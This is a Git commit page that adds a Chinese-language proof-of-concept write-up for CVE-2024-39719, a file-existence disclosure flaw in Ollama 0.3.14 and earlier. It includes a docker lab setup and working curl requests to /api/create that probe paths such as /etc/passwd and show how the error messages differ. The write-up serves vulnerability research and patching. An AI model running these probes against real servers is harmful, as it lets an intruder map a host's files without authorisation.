admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-05 10:50:23 +00:00
Code Issues Packages Projects Releases Wiki Activity

update CVE-2024-39719

Browse Source
This commit is contained in:
Threekiii 2025-03-10 16:59:35 +08:00
parent 1f129cd8ea
commit f73d5f6046
5 changed files with 84 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

84
人工智能漏洞/Ollama 文件存在性泄露漏洞 CVE-2024-39719.md Normal file
View File

@ -0,0 +1,84 @@
# Ollama 文件存在性泄露漏洞 CVE-2024-39719
## 漏洞描述
Ollama 0.3.14 及之前的版本中,攻击者可以通过 `api/create` 端点触发文件存在性泄露File Existence Disclosure漏洞。当调用 `CreateModel` 并传递一个不存在的路径参数时,服务器会直接返回 `"File does not exist"`(文件不存在)的错误消息。该漏洞允许攻击者探测服务器上特定文件是否存在,进而造成信息泄露。
参考链接:
- https://github.com/advisories/GHSA-cpxh-jwhh-m496
- https://oligosecurity.webflow.io/blog/more-models-more-probllms
- https://github.com/ollama/ollama/releases/tag/v0.1.47
- https://github.com/ollama/ollama/blob/cb42e607c5cf4d439ad4d5a93ed13c7d6a09fc34/server/images.go#L349
## 漏洞影响
```
Ollama ≤ 0.3.14
```
## 环境搭建
docker-compose.yml
```
services:
ollama:
image: ollama/ollama:0.3.14
container_name: ollama
volumes:
- ollama:/root/.ollama
ports:
- "11434:11434"
volumes:
ollama:
```
执行如下命令启动 Ollama 0.3.14 服务:
```
docker compose up -d
```
环境启动后,访问 `http://your-ip:11434/`,此时 Ollma 0.3.14 已经成功运行。
![](images/Ollama%20文件存在性泄露漏洞%20CVE-2024-39719/image-20250305134942768.png)
## 漏洞复现
使用 `curl` 命令向本地服务器发送请求,创建一个名为 `file-leak-existence` 的文件。
文件不存在时,将报错 `no such file or directory`
```
curl "http://your-ip:11434/api/create" -d '{"name": "file-leak-existence","path": "/tmp/non-existing"}'
-----
{"error":"error reading modelfile: open /tmp/non-existing: no such file or directory"}
```
![](images/Ollama%20文件存在性泄露漏洞%20CVE-2024-39719/image-20250305135226934.png)
文件存在时,将报错 `command must be one of "from", "license", "template", "system", "adapter", "parameter", or "message"`
```
curl "http://your-ip:11434/api/create" -d '{"name": "file-leak-existence","path": "/etc/passwd"}'
-----
{"error":"command must be one of \"from\", \"license\", \"template\", \"system\", \"adapter\", \"parameter\", or \"message\""}% e
```
![](images/Ollama%20文件存在性泄露漏洞%20CVE-2024-39719/image-20250305135433566.png)
传入目录而非文件路径时候,将报错 `{"error":"read /xxx: is a directory"}`
```
curl "http://your-ip:11434/api/create" -d '{"name": "file-leak-existence","path": "/etc"}'
-----
{"error":"read /etc: is a directory"}%
```
![](images/Ollama%20文件存在性泄露漏洞%20CVE-2024-39719/image-20250305135606639.png)
## 漏洞修复
- 升级至最新版本 https://github.com/ollama/ollama

BIN
人工智能漏洞/images/Ollama 文件存在性泄露漏洞 CVE-2024-39719/image-20250305134942768.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 52 KiB

BIN
人工智能漏洞/images/Ollama 文件存在性泄露漏洞 CVE-2024-39719/image-20250305135226934.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 36 KiB

BIN
人工智能漏洞/images/Ollama 文件存在性泄露漏洞 CVE-2024-39719/image-20250305135433566.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 37 KiB

BIN
人工智能漏洞/images/Ollama 文件存在性泄露漏洞 CVE-2024-39719/image-20250305135606639.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 31 KiB